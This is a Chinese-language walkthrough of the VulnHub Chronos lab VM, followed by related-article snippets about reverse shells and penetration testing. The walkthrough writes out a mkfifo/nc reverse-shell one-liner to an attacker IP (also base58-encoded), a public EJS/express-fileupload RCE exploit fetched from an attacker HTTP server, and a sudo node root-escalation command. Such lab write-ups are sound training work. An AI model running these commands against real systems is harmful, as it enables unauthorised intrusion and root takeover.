<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Chronos的實踐

    VSole2022-07-17 21:15:28

    今天實踐的是vulnhub的Chronos鏡像,

    下載地址,https://download.vulnhub.com/chronos/Chronos.ova,

    用workstation無法導入,換virtualbox沒問題,

    Kali攻擊機還是在workstation下,地址掃描,

    sudo netdiscover -r 192.168.1.0/24,根據經驗,靶機地址是103,

    繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.103,

    瀏覽器訪問,發現首頁的源碼里有提示,可以訪問chronos.local:8000,

    本地windows和kali攻擊機都添加了chronos.local的hosts記錄,

    直接訪問chronos.local:8000,發現能顯示當前系統的時間,從源碼中看到跟主頁源碼里一樣的內容,

    根據經驗猜測format的內容是編碼過的,經過驗證發現是base58,

    猜測這個位置有命令執行漏洞,構造一串反彈shell腳本,

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.106 4444 >/tmp/f,base58轉換,

    RHuraBnsjzxcoNY4XrKRdorq3g8R8oVnXEjCNSLCRikBctUTCCjGaaEw1WztLuPayMVYS7ZBhr4j3X8w9sP7Mrm4rYrQ3UbUjt9PjyA7wa1L5Jku,

    在burpsuite里抓到訪問的請求,

    把base58編碼后的內容換上去,主要還要換User-Agent: Chronos,

    轉發之前在kali攻擊機上開啟反彈shell監聽,nc -lvp 4444,

    這就拿到了反彈shell,id看一下不是root,需要進一步提權,

    在當前賬號下查到有用的信息,express-fileupload軟件和版本,

    網上搜到漏洞和利用方法,

    https://dev.to/boiledsteak/simple-remote-code-execution-on-ejs-web-applications-with-express-fileupload-3325,

    下載漏洞利用腳本,https://github.com/boiledsteak/EJS-Exploit/blob/main/attacker/EJS-RCE-attack.py,

    根據實際情況進行修改,

    kali攻擊機上開啟http下載服務,python2 -m SimpleHTTPServer 80,

    以及開啟反彈shell監聽,nc -lvp 8888,靶機那邊下載并執行,

    反彈shell這就又過來了,id確認還不是root,但是可sudo -l,發現node程序是root權限執行的,

    搜索node的本地提權方法,

    提權,sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})',

    確認拿到root的shell,任務完成。

    shelltmp
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    接著老毛病就犯了,上去就輸入了個1查詢接著輸入了1’嘖嘖嘖,這明顯有SQL注入哇。果斷掏出SQLMAP神器。結局很完美,不僅存在注入,還是DBA的權限。初步信息搜集既然拿到了shell,那么第一步肯定是信息搜集了。免殺shellcode完美上線這里我用的K8gege的 Ladon插件進行掃描內網得,主要掃描出來的結果格式比較好看。橫向滲透&進一步信息搜集內網第一波那必須的是MS17-010了,這里我同樣用K8gege的Ladon。
    網安引領時代,彌天點亮未來 0x00序言在日常工作中,如果辦公電腦或者個人PC有以下兩個方面的異常行為
    前言建議直接復制粘貼到筆記,或點贊收藏,因為時常會用到,這是整理的一些常見的反向shell和特權提升的筆記文檔,紅隊成員必會!反向shell-備忘錄 通常在獲得遠程代碼執行之后,我們希望獲得一些交互式訪問—而不是發出單個命令獲取單個回顯或與 web shell 交互
    反彈shell匯總
    2021-07-28 10:01:11
    反彈shell匯總
    紅隊滲透項目之MinUv1
    2022-07-05 21:13:22
    紅隊滲透
    描述SUID代表設置的用戶ID,是一種Linux功能,允許用戶在指定用戶的許可下執行文件。
    上述操作均在gitlab默認配置情況下,若漏洞利用無法復現可留言,一起討論研究。
    上周在先知社區看到@Xgstar師傅寫的《SQLserver寫Webshell總結-突破中文路徑》文章中提到一個利用批處理寫Webshell至中文路徑的思路,但最后他并沒有成功利用這個思路寫入Webshell。 因為之前也寫過這類場景的利用思路,所以就想對他提到的這個思路以及遇到的問題簡單測試下,關于更多寫Webshell至中文路徑的思路可參考我之前寫的《MSSQL高權限注入寫馬至中文路徑》。
    如果手工測試無果后再用代理手法掃描網站,必要的時候設置二級代理。什么站能掃什么站不能掃,心里一定要有點 b 數!淺藍的滲透測試導圖以及小工具這里有一個更加詳細的導圖,可以做一個大致的方向參考,跟著方向逐一測試, 期間也可以鞏固基礎。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类